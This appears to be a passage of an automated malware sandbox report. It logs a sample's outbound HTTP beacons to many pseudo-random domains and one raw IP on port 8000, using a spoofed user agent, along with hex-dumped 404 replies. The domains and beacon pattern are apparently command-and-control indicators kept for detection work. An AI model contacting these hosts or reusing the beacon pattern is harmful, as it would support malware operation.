Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww8.galyqaz.comConnection: Keep-AliveCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww3.galyqaz.comConnection: Keep-AliveCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0450-397d-84b8-860db74cb63b HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731347439.3564880
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:50:23 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 
7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:50:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:50:23 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 
7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:50:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:30 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:50:36 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:50:36 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:39 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:40 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:50:48 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:48 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:50:48 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Mon, 11 Nov 2024 17:50:43 GMT; Content-Length: 1245
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:48 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
